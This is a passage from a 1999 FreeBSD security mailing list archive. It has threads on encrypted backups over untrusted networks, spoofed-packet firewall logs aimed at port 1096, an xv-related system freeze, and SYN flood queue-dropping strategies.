3) I tried others of their pages and the error did not recur. So I dare say there is some buggy code on that page and while it is trying to execute, the browser is stuck.(Even the animation stops in the corner) It has someting to do with browser-type parsing because it was probably processing the data I saw on top (which was the Netscape version and language followed by some interesting numbers) It is possible that this has again something to do with their client-tracking system.,. 4) It was clear from the very beggining that they design their pages in a way to look much better on IE (so that they can say, well, see the difference for yourself) but cannot understand what they use JavaScript for. On the IE version it adds the functionality that the buttons become 3D and Blue when you move your mouse over them. I am not an expert on JavaScript but if they try to implement something similar here then it simply doesn't work (and for that matter, never has, on any of their pages) 5) I do not think it is a DOS. I think that it is both M$'s and Netscape's fault. At M$ they simply ignore the standards when it comes to good-looking but product-consicous (Win only) pages and use asp, which is their own standard for including code into the page that executes while loading. That's why it's pretty sure that if you see asp pages somewhere than the server is almost certainly NT... As for Netscape, memory handling problems always occured, didn't they? Besides, I could see that Netscape was stuck in RUN status so it was trying very hard to run something. This status is _very CPU consuming but memory is not always affected. I saw something similar for RealPlayer, when it looses the connection to the streaming server, it stucks in this mode until stopped or regains the connection. It brings up CPU usage to 100% but it doesn't touch the RAM. On WinNT, it actually took over all of the available RAM and swap when left at that and in the end it freezed. On Win95 it even crashed the machine occasionally. So buggy software has always existed... BTW The worst I can think of on M$ part that they wanted to make the page a bit slower to load to show off that IE is much better... P.S.: I checked, Communicator 4.6 is still a.out. Regards: Szilveszter Szeged University Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 13:23:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from lanck.ru (hold.lanck.ru [195.19.223.4]) by hub.freebsd.org (Postfix) with ESMTP id 3B2B4152F4 for ; Mon, 17 May 1999 13:23:25 -0700 (PDT) (envelope-from uwl@lanck.ru) Received: (from uucp@localhost) by lanck.ru (8.8.8/8.8.5) with UUCP id AAA07842 for freebsd-security@FreeBSD.ORG; Tue, 18 May 1999 00:29:10 +0400 (MSD) Received: (from uwl@localhost) by koala.lanck.ru (8.8.8/8.8.8) id AAA24108; Tue, 18 May 1999 00:04:52 +0400 (MSD) (envelope-from uwl) Message-ID: <19990518000449.A23521@lanck.ru> Date: Tue, 18 May 1999 00:04:49 +0400 From: Vladimir Uralsky To: freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: <199905170014.MAA18766@smtp1.ihug.co.nz> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: <199905170014.MAA18766@smtp1.ihug.co.nz>; from nr1@ihug.co.nz on Mon, May 17, 1999 at 12:14:19PM +1200 X-Operating-System: FreeBSD 2.2.8-RELEASE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 17, 1999 at 12:14:19PM +1200, nr1@ihug.co.nz wrote: > Can anyone recommend how I should go about creating a backup to an untrusted > machine that has the tape drive, and using an untrusted network. see cfs in /usr/ports/security/cfs. -- Vova. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 14: 2:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id C4C8F156CC for ; Mon, 17 May 1999 14:02:06 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id OAA29710 for ; Mon, 17 May 1999 14:03:52 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda29704; Mon May 17 14:03:44 1999 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id OAA29759 for ; Mon, 17 May 1999 14:01:57 -0700 (PDT) Message-Id: <199905172101.OAA29759@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdu29752; Mon May 17 14:01:54 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 3.1-RELEASE X-Sender: cschuber To: freebsd-security@freebsd.org Subject: Interesting Attack Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 17 May 1999 14:01:54 -0700 From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm seeing a number of packets from sites around the Internet to port 1096. What service lives on port 1096? Has anyone seen this before? I did change my firewall rules in response to the ACK+RST probes discussed on BUGTRAQ and here to catch this kind of activity. May 12 22:40:58 friendly.system /kernel: ipfw: 65534 Deny TCP 24.93.100.204:0 1.2.3.4:1096 in via xl0 May 13 02:26:03 friendly.system /kernel: ipfw: 65534 Deny TCP 207.76.224.149:113 1.2.3.4:1096 in via xl0 May 13 19:56:51 friendly.system /kernel: ipfw: 65534 Deny TCP 207.154.210.5:6667 1.2.3.4:1096 in via xl0 May 13 19:56:51 friendly.system /kernel: ipfw: 65534 Deny TCP 207.154.210.5:6667 1.2.3.4:1096 in via xl0 May 14 20:15:13 friendly.system /kernel: ipfw: 65534 Deny TCP 129.11.116.121:2 1.2.3.4:1096 in via xl0 May 15 00:20:08 friendly.system /kernel: ipfw: 65534 Deny TCP 207.240.152.35:0 1.2.3.4:1096 in via xl0 May 15 00:20:33 friendly.system /kernel: ipfw: 65534 Deny TCP 207.240.152.35:0 1.2.3.4:1096 in via xl0 May 15 00:56:01 friendly.system /kernel: ipfw: 65534 Deny TCP 24.94.50.65:139 1.2.3.4:1096 in via xl0 May 15 00:56:03 friendly.system /kernel: ipfw: 65534 Deny TCP 24.94.50.65:139 1.2.3.4:1096 in via xl0 May 15 02:33:56 friendly.system /kernel: ipfw: 65534 Deny TCP 159.138.5.1:46643 1.2.3.4:1096 in via xl0 May 15 12:25:51 friendly.system /kernel: ipfw: 65534 Deny TCP 200.33.78.3:23 1.2.3.4:1096 in via xl0 May 15 12:54:38 friendly.system /kernel: ipfw: 65534 Deny TCP 200.33.78.3:23 1.2.3.4:1096 in via xl0 May 15 16:06:06 friendly.system /kernel: ipfw: 65534 Deny TCP 167.205.22.114:23 1.2.3.4:1096 in via xl0 May 15 16:06:06 friendly.system /kernel: ipfw: 65534 Deny TCP 167.205.22.114:23 1.2.3.4:1096 in via xl0 May 15 21:24:49 friendly.system /kernel: ipfw: 65534 Deny TCP 192.148.248.24:2 1.2.3.4:1096 in via xl0 May 15 21:33:22 friendly.system /kernel: ipfw: 65534 Deny TCP 192.148.248.24:23 1.2.3.4:1096 in via xl0 May 15 21:33:23 friendly.system /kernel: ipfw: 65534 Deny TCP 192.148.248.24:23 1.2.3.4:1096 in via xl0 May 15 22:47:50 friendly.system /kernel: ipfw: 65534 Deny TCP 207.229.143.42:22 1.2.3.4:1096 in via xl0 May 15 22:47:50 friendly.system /kernel: ipfw: 65534 Deny TCP 207.229.143.42:22 1.2.3.4:1096 in via xl0 May 16 00:18:08 friendly.system /kernel: ipfw: 65534 Deny TCP 209.54.43.135:23 1.2.3.4:1096 in via xl0 May 16 00:18:08 friendly.system /kernel: ipfw: 65534 Deny TCP 209.54.43.135:23 1.2.3.4:1096 in via xl0 May 16 00:34:48 friendly.system /kernel: ipfw: 65534 Deny TCP 208.201.224.36:113 1.2.3.4:1096 in via xl0 May 16 00:34:49 friendly.system /kernel: ipfw: 65534 Deny TCP 208.201.224.36:113 1.2.3.4:1096 in via xl0 May 16 11:39:32 friendly.system /kernel: ipfw: 65534 Deny TCP 203.37.45.2:6667 1.2.3.4:1096 in via xl0 May 16 13:04:42 friendly.system /kernel: ipfw: 65534 Deny TCP 203.37.45.2:6667 1.2.3.4:1096 in via xl0 May 16 14:46:57 friendly.system /kernel: ipfw: 65534 Deny TCP 209.224.60.180:23 1.2.3.4:1096 in via xl0 May 16 14:47:36 friendly.system /kernel: ipfw: 65534 Deny TCP 209.224.60.180:23 1.2.3.4:1096 in via xl0 May 16 17:51:34 friendly.system /kernel: ipfw: 65534 Deny TCP 207.96.57.242:113 1.2.3.4:1096 in via xl0 May 16 18:26:58 friendly.system /kernel: ipfw: 65534 Deny TCP 24.1.187.156:0 1.2.3.4:1096 in via xl0 May 16 18:27:49 friendly.system /kernel: ipfw: 65534 Deny TCP 24.1.187.156:0 1.2.3.4:1096 in via xl0 May 16 23:41:46 friendly.system /kernel: ipfw: 65534 Deny TCP 208.133.73.83:6667 1.2.3.4:1096 in via xl0 May 16 23:41:46 friendly.system /kernel: ipfw: 65534 Deny TCP 208.133.73.83:6667 1.2.3.4:1096 in via xl0 May 17 13:05:19 friendly.system /kernel: ipfw: 65534 Deny TCP 24.64.167.106:139 1.2.3.4:1096 in via xl0 Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 14:10:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.go2france.com (go2france.com [209.51.193.70]) by hub.freebsd.org (Postfix) with SMTP id 22CEC15677 for ; Mon, 17 May 1999 14:10:42 -0700 (PDT) (envelope-from lconrad@Go2France.com) Received: from dell01 [195.68.3.43] by mail.go2france.com (SMTPD32-4.03) id A1FA5A100F2; Mon, 17 May 1999 15:46:02 EST5EDT Message-Id: <4.1.19990517230816.027ceee0@mail.go2france.com> X-Sender: lconrad@mail.go2france.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 17 May 1999 23:08:28 +0200 To: freebsd-security@FreeBSD.ORG From: Len Conrad Subject: subscribe freebsd-net Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe freebsd-security To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 14:45:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 9E25614E10 for ; Mon, 17 May 1999 14:45:27 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id XAA60012; Mon, 17 May 1999 23:45:19 +0200 (CEST) (envelope-from des) To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: Interesting Attack References: <199905172101.OAA29759@passer.osg.gov.bc.ca> From: Dag-Erling Smorgrav Date: 17 May 1999 23:45:18 +0200 In-Reply-To: Cy Schubert's message of "Mon, 17 May 1999 14:01:54 -0700" Message-ID: Lines: 24 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cy Schubert writes: > I'm seeing a number of packets from sites around the Internet to > port 1096. What service lives on port 1096? Has anyone seen this > before? None. I think somebody's trying to bounce packets off your machine to another box by spoofing the source address, *or* somebody has been sending spoofed packets with your IP as source address to some other boxen. Look at the source ports: 23 (telnet), 139 (NetBIOS), 6667 (IRC)... I checked the IP addresses which appear with port 6667, and they're all IRC servers. You wouldn't expect connections to *originate* from port 6667 on these boxen; I think somebody sent them SYN packets made up to look as if they came from you, and they replied. In any case, I don't think you're the target; you're just an innocent passer-by which they picked to pin the blame on (from the POV of the target sites, it looks as if *you* ran a port scan on them - or would if your firewall hadn't dropped those packets). DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 16:48:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id B01B61540E for ; Mon, 17 May 1999 16:48:30 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id JAA29928; Tue, 18 May 1999 09:18:29 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA28585; Tue, 18 May 1999 09:19:19 +0930 Date: Tue, 18 May 1999 09:19:18 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Dag-Erling Smorgrav Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: Interesting Attack In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 17 May 1999, Dag-Erling Smorgrav wrote: > Cy Schubert writes: > > I'm seeing a number of packets from sites around the Internet to > > port 1096. What service lives on port 1096? Has anyone seen this > > before? > > None. I think somebody's trying to bounce packets off your machine to > another box by spoofing the source address, *or* somebody has been > sending spoofed packets with your IP as source address to some other > boxen. > > Look at the source ports: 23 (telnet), 139 (NetBIOS), 6667 (IRC)... I > checked the IP addresses which appear with port 6667, and they're all > IRC servers. You wouldn't expect connections to *originate* from port > 6667 on these boxen; I think somebody sent them SYN packets made up to > look as if they came from you, and they replied. > > In any case, I don't think you're the target; you're just an innocent > passer-by which they picked to pin the blame on (from the POV of the > target sites, it looks as if *you* ran a port scan on them - or would > if your firewall hadn't dropped those packets). I was getting hundreds of similar packets per day here a few weeks ago, almost all from different sites, all from spoofed source addresses, to a nonexistent IP address and on an unobtrusive port number (1584) but the common thread was that all of the source hosts were running an IRC daemon. I never did find out conclusively what it was, but my guess is that someone was using my source address to spoof packets from, and I was seeing reverse probes by the IRC server. It all stopped when I turned on IP unreachables on my firewall.. Kris ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 16:49: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from fallout.campusview.indiana.edu (fallout.campusview.indiana.edu [149.159.1.1]) by hub.freebsd.org (Postfix) with ESMTP id AD83D1540E for ; Mon, 17 May 1999 16:48:57 -0700 (PDT) (envelope-from jfieber@fallout.campusview.indiana.edu) Received: from localhost (jfieber@localhost) by fallout.campusview.indiana.edu (8.9.3/8.9.1) with ESMTP id SAA66234; Mon, 17 May 1999 18:48:47 -0500 (EST) Date: Mon, 17 May 1999 18:48:46 -0500 (EST) From: John Fieber To: Wes Peters Cc: nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <374024BF.3EAD1892@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Wes Peters wrote: > > Can anyone recommend how I should go about creating a backup to an untrusted > > machine that has the tape drive, and using an untrusted network. > > Can Amanda help with something like this? Perhaps if you fed it an > encryption program instead of a compression program? Does Amanda > have the ability to encrypt files as they are backed up? It supposedly has support for Kerberos IV for both authentication and encrypted transfer. I can't say I've tried to make it work though as I'm in a Kerberos V environment. -john To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 19:34:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from etosha (modem02.tdnet.com.br [200.236.148.195]) by hub.freebsd.org (Postfix) with SMTP id C5E2914E96 for ; Mon, 17 May 1999 19:34:40 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: (qmail 7351 invoked from network); 18 May 1999 02:34:25 -0000 Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 18 May 1999 02:34:25 -0000 Message-ID: <3740B863.6C20B59E@tdnet.com.br> Date: Mon, 17 May 1999 21:46:28 -0300 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: user uses xv3.10a (PNG) to halt my system. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear gentleman, probably, this is not the most suitable mailing list to post this mesg, but it's not worth to subscribe fbsd-questions only to get a answer. (if you hate me for that, ignore me) a) My system is 2.2.8Stable, where can i get a updated list about patch to this system? b) I have installed xv 3.10a (PNG), but my system has got freezed by running this software! So now, a user(i don't know which) have being stopping my system. c) is there possible to know which user is doing that? d) How can an user application halt my system, isn't fbsd supposed to be robust enough to handle this ? Thank you for your time and cooperation! best regards. Gustavo Rios To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 19:42:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from implode.root.com (root.com [209.102.106.178]) by hub.freebsd.org (Postfix) with ESMTP id C5009153F2 for ; Mon, 17 May 1999 19:42:50 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.8/8.8.5) with ESMTP id TAA19780; Mon, 17 May 1999 19:41:56 -0700 (PDT) Message-Id: <199905180241.TAA19780@implode.root.com> To: Unknow User Cc: freebsd-security@FreeBSD.ORG Subject: Re: user uses xv3.10a (PNG) to halt my system. In-reply-to: Your message of "Mon, 17 May 1999 21:46:28 -0300." <3740B863.6C20B59E@tdnet.com.br> From: David Greenman Reply-To: dg@root.com Date: Mon, 17 May 1999 19:41:56 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Dear gentleman, > >probably, this is not the most suitable mailing list to post this mesg, >but it's not worth to subscribe fbsd-questions only to get a answer. (if >you hate me for that, ignore me) > >a) My system is 2.2.8Stable, where can i get a updated list about patch >to this system? >b) I have installed xv 3.10a (PNG), but my system has got freezed by >running this software! So now, a user(i don't know which) have being >stopping my system. >c) is there possible to know which user is doing that? >d) How can an user application halt my system, isn't fbsd supposed to be >robust enough to handle this ? If you don't know which user is doing it, then how do you know that it is xv that is causing the problem? I use that version of xv on various systems here, with different versions of FreeBSD (including 2.2.8), all the time and have never had problems. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project - http://www.freebsd.org Creator of high-performance Internet servers - http://www.terasolutions.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 19:47:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from etosha (modem02.tdnet.com.br [200.236.148.195]) by hub.freebsd.org (Postfix) with SMTP id A61D314E96 for ; Mon, 17 May 1999 19:47:31 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: (qmail 302 invoked from network); 18 May 1999 02:47:21 -0000 Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 18 May 1999 02:47:21 -0000 Message-ID: <3740D4B8.7B2AE924@tdnet.com.br> Date: Mon, 17 May 1999 23:47:20 -0300 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: dg@root.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: user uses xv3.10a (PNG) to halt my system. References: <199905180241.TAA19780@implode.root.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Simple, i did work with fbsd, and the system got freezed! I sent a mail to all users, and one send me a mail that he had the same problem and he did not wish to freeze the system! As no core file is dumped, is there any way to send xv authors something to track the problem ? -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 19:48: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id B0D5A15655 for ; Mon, 17 May 1999 19:47:58 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id MAA31701; Tue, 18 May 1999 12:17:56 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA32583; Tue, 18 May 1999 12:18:46 +0930 Date: Tue, 18 May 1999 12:18:45 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Unknow User Cc: freebsd-security@freebsd.org Subject: Re: user uses xv3.10a (PNG) to halt my system. In-Reply-To: <3740B863.6C20B59E@tdnet.com.br> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Unknow User wrote: > a) My system is 2.2.8Stable, where can i get a updated list about patch > to this system? Try cvsup. It's documented in the handbook. > b) I have installed xv 3.10a (PNG), but my system has got freezed by > running this software! So now, a user(i don't know which) have being > stopping my system. How do you know it is xv? It's more likely you're running into a problem with the system, not triggered by xv at all. You're correct that a user application shouldn't be able to do this, and given the lack of any other reports about this problem I doubt it is in your case either. Kris ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 19:51:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from etosha (modem02.tdnet.com.br [200.236.148.195]) by hub.freebsd.org (Postfix) with SMTP id 8321714D86 for ; Mon, 17 May 1999 19:51:25 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: (qmail 4216 invoked from network); 18 May 1999 02:51:14 -0000 Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 18 May 1999 02:51:14 -0000 Message-ID: <3740D5A2.9E5D0816@tdnet.com.br> Date: Mon, 17 May 1999 23:51:14 -0300 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: Kris Kennaway Cc: freebsd-security@freebsd.org Subject: Re: user uses xv3.10a (PNG) to halt my system. References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > How do you know it is xv? It's more likely you're running into a problem with > the system, not triggered by xv at all. You're correct that a user application > shouldn't be able to do this, and given the lack of any other reports about > this problem I doubt it is in your case either. > > Kris No, the user send me mails about the problem (he did not want to hang the system), and i workd with xv, and the system really hanged. -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 19:52:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id BB83D14A09 for ; Mon, 17 May 1999 19:52:29 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id MAA14768; Tue, 18 May 1999 12:52:14 +1000 (EST) From: Darren Reed Message-Id: <199905180252.MAA14768@cheops.anu.edu.au> Subject: Re: user uses xv3.10a (PNG) to halt my system. To: kernel@tdnet.com.br (Unknow User) Date: Tue, 18 May 1999 12:52:14 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <3740B863.6C20B59E@tdnet.com.br> from "Unknow User" at May 17, 99 09:46:28 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Unknow User, sie said: > > Dear gentleman, > > probably, this is not the most suitable mailing list to post this mesg, > but it's not worth to subscribe fbsd-questions only to get a answer. (if > you hate me for that, ignore me) > > a) My system is 2.2.8Stable, where can i get a updated list about patch > to this system? > b) I have installed xv 3.10a (PNG), but my system has got freezed by > running this software! So now, a user(i don't know which) have being > stopping my system. > c) is there possible to know which user is doing that? > d) How can an user application halt my system, isn't fbsd supposed to be > robust enough to handle this ? xv is a big user of both RAM and CPU. You might want to do something like ru "vmstat 1" and then start up xv to see what happens. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 19:53:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.inreach.com (unknown [209.142.0.6]) by hub.freebsd.org (Postfix) with ESMTP id 4412414BD6 for ; Mon, 17 May 1999 19:53:34 -0700 (PDT) (envelope-from condor@inreach.com) Received: from pavilion (209-142-4-217.stk.inreach.net [209.142.4.217]) by smtp.inreach.com (8.9.3/8.9.3) with SMTP id TAA21992; Mon, 17 May 1999 19:41:00 -0700 (PDT) Received: by localhost with Microsoft MAPI; Mon, 17 May 1999 19:52:54 -0700 Message-ID: <01BEA09E.DA43B5A0.condor@inreach.com> From: CONDOR Reply-To: "condor@inreach.com" To: "'John Fieber'" , Wes Peters Cc: "nr1@ihug.co.nz" , "freebsd-security@FreeBSD.ORG" Subject: RE: secure backup Date: Mon, 17 May 1999 19:44:30 -0700 Organization: Condor Worldwide Data Systems X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----Original Message----- From: John Fieber [SMTP:jfieber@indiana.edu] Sent: Monday, May 17, 1999 16:49 To: Wes Peters Cc: nr1@ihug.co.nz; freebsd-security@FreeBSD.ORG Subject: Re: secure backup On Mon, 17 May 1999, Wes Peters wrote: > > Can anyone recommend how I should go about creating a backup to an untrusted > > machine that has the tape drive, and using an untrusted network. [CONDOR] Buy a tape drive.. they are cheaper now than before. ;-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 20: 6:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 9582914A09 for ; Mon, 17 May 1999 20:06:38 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA58064; Mon, 17 May 1999 21:05:32 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA75124; Mon, 17 May 1999 21:07:05 -0600 (MDT) Message-Id: <199905180307.VAA75124@harmony.village.org> To: Harold Gutch Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Cc: security@FreeBSD.ORG In-reply-to: Your message of "Sat, 15 May 1999 00:10:18 +0200." <19990515001018.A22645@foobar.franken.de> References: <19990515001018.A22645@foobar.franken.de> <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> <19990514072546.A20779@foobar.franken.de> <4.2.0.37.19990514133829.0461e220@localhost> <19990514225001.A22317@foobar.franken.de> <4.2.0.37.19990514154319.04610b80@localhost> Date: Mon, 17 May 1999 21:07:05 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990515001018.A22645@foobar.franken.de> Harold Gutch writes: : Perhaps dropping a random socket is a better approach... RED has proven to be a good way to deal with congestion. A few years ago when all of this came up the first time, I did some back of the envelope calculations that showed that randomly dropping items in the SYN queue produced a higher percentage chance of connecting to a port under attack than simply discarding the oldest one in the queue. Has anybody come up with a fix for this problem? I've not seen one come accross. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 20:23:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from WEBBSD1.turnaround.com.au (webbsd1.turnaround.com.au [203.39.138.49]) by hub.freebsd.org (Postfix) with ESMTP id C451A14D0A for ; Mon, 17 May 1999 20:23:17 -0700 (PDT) (envelope-from A_Johns@TurnAround.com.au) Received: from TurnAround.com.au (dhcp64.turnaround.com.au [192.168.1.64]) by WEBBSD1.turnaround.com.au (8.8.7/8.8.7) with ESMTP id NAA29605; Tue, 18 May 1999 13:35:20 +1000 (EST) (envelope-from A_Johns@TurnAround.com.au) Message-ID: <3740DD24.464B5ADC@TurnAround.com.au> Date: Tue, 18 May 1999 13:23:16 +1000 From: Andrew Johns Organization: TurnAround 